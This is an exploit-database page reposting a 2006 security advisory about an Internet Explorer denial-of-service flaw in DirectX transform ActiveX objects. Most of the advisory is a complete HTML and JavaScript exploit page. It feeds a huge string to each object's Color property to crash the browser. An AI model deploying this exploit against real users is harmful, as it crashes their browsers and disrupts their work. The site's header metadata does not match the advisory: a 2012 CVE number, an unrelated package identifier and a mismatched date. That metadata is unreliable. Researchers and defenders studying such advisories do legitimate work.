Advertisement






Internet Explorer Multiple COM Objects Color Property DoS Vulnerability

CVE Category Price Severity
CVE-2012-4787 CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer Not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2006-09-02
CPE PURL
cpe:cpe:/a:microsoft:internet_explorer pkg:pkg:hex/[email protected]
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.052 0.27992

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080148

Below is a copy:

Advisory ID:
XSec-06-09

Advisory Name:
Internet Explorer Multiple COM Objects Color Property DoS Vulnerability

Release Date:
08/22/2006

Tested on:
Windows 2000/XP Internet Explorer 6.0 SP1

Affected version:
Windows 2000
Windows XP

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
When Internet Explorer Handle Multiple COM
Objects(dxtmsft.dll/dxtmsft3.dll) Color Property Put Method, Set a Long Strings to Color Property Will Crash Internet Explorer.

Exploit:
=============== Color.htm start ================

<!--

// Internet Explorer Multiple COM Object Color Property DoS Vulnerability
// tested on Windows 2000 SP4/XP SP2

// http://www.xsec.org
// nop (nop#xsec.org)

--!>
<html>
<head>
<title></title>
</head>
</body>
<script>
var i =0;
var Objects = new Array(

// CLSID: {3A04D93B-1EDD-4f3f-A375-A03EC19572C4}
// Info: MaskFilter
// ProgID: DXImageTransform.Microsoft.MaskFilter.1
// InprocServer32: C:WINNTsystem32dxtmsft.dll
"DXImageTransform.Microsoft.MaskFilter.1",

// CLSID: {421516C1-3CF8-11D2-952A-00C04FA34F05}
// Info: Chroma
// ProgID: DXImageTransform.Microsoft.Chroma.1
// InprocServer32: C:WINNTsystem32dxtmsft.dll
"DXImageTransform.Microsoft.Chroma.1",

// CLSID: {9F8E6421-3D9B-11D2-952A-00C04FA34F05}
// Info: Glow
// ProgID: DXImageTransform.Microsoft.Glow.1
// InprocServer32: C:WINNTsystem32dxtmsft.dll
"DXImageTransform.Microsoft.Glow.1",

// CLSID: {ADC6CB86-424C-11D2-952A-00C04FA34F05}
// Info: DropShadow
// ProgID: DXImageTransform.Microsoft.DropShadow.1
// InprocServer32: C:WINNTsystem32dxtmsft.dll
"DXImageTransform.Microsoft.DropShadow.1",

// CLSID: {E71B4063-3E59-11D2-952A-00C04FA34F05}
// Info: Shadow
// ProgID: DXImageTransform.Microsoft.Shadow.1
// InprocServer32: C:WINNTsystem32dxtmsft.dll
"DXImageTransform.Microsoft.Shadow.1",

// CLSID: {8241F015-84D3-11d2-97E6-0000F803FF7A}
// Info: Shapes
// ProgID: DX3DTransform.Microsoft.Shapes.1
// InprocServer32: C:WINNTsystem32dxtmsft3.dll
"DX3DTransform.Microsoft.Shapes.1",

null
);

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}

while(Objects[i])
{
var a = null;

window.status = "Create Object " + Objects[i] + "...";

try { a = new ActiveXObject(Objects[i]); } catch(e){}

if(a)
{
window.status = "Try Set " + Objects[i] + ".Color ...";
try { a.Color = b;} catch(e){}
}

i++;
}

window.status = "failed!";

</script>
</body>
</html>

=============== Color.htm end ==================

Link:
http://xsec.org/index.php?module=releases&act=view&type=1&id=17

About XSec:
We are redhat.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum